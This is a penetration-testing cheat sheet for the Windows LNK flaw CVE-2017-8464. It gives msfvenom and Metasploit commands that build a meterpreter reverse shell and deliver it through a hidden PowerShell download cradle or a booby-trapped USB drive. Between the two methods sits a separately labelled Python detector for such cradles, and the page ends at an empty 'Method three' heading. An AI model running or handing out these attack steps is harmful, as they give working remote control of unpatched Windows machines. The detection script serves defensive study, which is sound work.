Common CVEs
CVE-2017-8464
Affected versions
Windows 7 / Windows 8.1 / Windows RT 8.1 / Windows 10 / Windows Server 2008 / Windows Server 2008 R2 / Windows Server 2012 / Windows Server 2012 R2 / Windows Server 2016
Method one
- On Kali
1. msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=KaliIP LPORT=4444 -f psh-reflection > 1.ps1
2. cp /root/1.ps1 /var/www/html
- On the target machine
1. powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://KaliIP/1.ps1');test.ps1"
- On Kali
msfconsole
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST KaliIP
set LPORT 4444
exploit
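The target-side command in method one is a textbook PowerShell download cradle: a hidden window, an execution-policy bypass and a remote script pulled into memory with IEX. Those three traits together are what a detection engineer keys on. The following Python script is an added defender-side example, not part of the original page; it scans constructed process-creation records (Sysmon event ID 1 style fields host/image/cmdline, all made up here, with documentation-range IPs) and flags PowerShell launches that combine two or more of the indicators, also decoding an -EncodedCommand payload and re-scanning it, since that is the usual way the same cradle is hidden. It generalises past the page's exact command line by accepting PowerShell's abbreviated parameter names (-w, -ep, -enc).

```python
import base64
import binascii
import re
from typing import Dict, List, Optional

# Indicator patterns (case-insensitive). PowerShell accepts any unambiguous prefix
# of a parameter name, so "-w hidden", "-win hidden" and "-windowstyle hidden" are
# equivalent; the regexes allow those abbreviations.
INDICATORS = {
    "hidden_window": re.compile(r"-w[a-z]*\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(?:p|x[a-z]*)\s+(?:bypass|unrestricted)", re.I),
    "download_cradle": re.compile(
        r"(?:\biex\b|invoke-expression)[\s\S]*?"
        r"(?:downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b)"
        r"|(?:downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b)[\s\S]*?"
        r"(?:\biex\b|invoke-expression)",
        re.I),
    # -e / -ec / -enc / -encodedcommand followed by a base64 blob
    "encoded_command": re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{20,})", re.I),
}

# Constructed base64 for an encoded cradle (UTF-16LE, as PowerShell expects).
ENCODED_CRADLE = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')".encode("utf-16le")
).decode("ascii")

# Constructed sample events; hosts, paths and IPs are invented for this example.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "ws01",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -windowstyle hidden -exec bypass -c "
                "\"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/1.ps1')\""},
    {"host": "ws02",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\scripts\inventory.ps1"},
    {"host": "ws03",
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell -nop -w hidden -ep bypass -enc {ENCODED_CRADLE}"},
    {"host": "srv01",
     "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
]


def decode_encoded_command(b64: str) -> Optional[str]:
    """Decode a PowerShell -EncodedCommand blob (base64 of UTF-16LE); None if malformed."""
    try:
        raw = base64.b64decode(b64, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        return raw.decode("utf-16le")
    except UnicodeDecodeError:
        return None


def analyze_event(event: Dict[str, str]) -> Dict[str, object]:
    """Return the indicators that fire on one process-creation event and an alert verdict."""
    result: Dict[str, object] = {"host": event["host"], "indicators": [], "decoded": None, "alert": False}
    if not event["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return result  # only PowerShell launches are in scope
    cmd = event["cmdline"]
    fired = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    m = INDICATORS["encoded_command"].search(cmd)
    if m:
        decoded = decode_encoded_command(m.group(1))
        result["decoded"] = decoded
        # the cradle is usually hidden inside the encoded blob, so scan the plaintext too
        if decoded and "download_cradle" not in fired and INDICATORS["download_cradle"].search(decoded):
            fired.append("download_cradle")
    result["indicators"] = fired
    result["alert"] = len(fired) >= 2  # a single trait is common in admin scripts; two together is rare
    return result


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return only the events that meet the alert threshold."""
    return [r for r in (analyze_event(e) for e in events) if r["alert"]]


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit["host"], hit["indicators"])
        if hit["decoded"]:
            print("  decoded:", hit["decoded"])
```

The threshold of two indicators keeps ordinary `-ExecutionPolicy RemoteSigned -File …` automation out of the alert queue while still catching the page's command and its encoded variant; in production the same logic would run over Sysmon event 1 or Security 4688 with command-line auditing enabled, and the decoded text would be passed on to the same scanner as any other script.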
Method two
- On Kali
Download - https://github.com/rapid7/metasploit-framework/archive/master.zip
Copy cve_2017_8464_lnk_rce.rb from modules/exploits/windows/fileformat in the archive to /usr/share/metasploit-framework/modules/exploits/windows/fileformat
Copy the cve-2017-8464 folder from data/exploits in the archive to /usr/share/metasploit-framework/data/exploits
Open a terminal; the generated files are written to /root/.msf4/local
msfconsole
use exploit/windows/fileformat/cve_2017_8464_lnk_rce
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [your IP address]
exploit
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST [your IP address]
run
- On the target machine
Insert the removable disk into the target machine; if AutoPlay is enabled on the target, the session calls back as soon as "browse files" is chosen
Method three - POC/EXP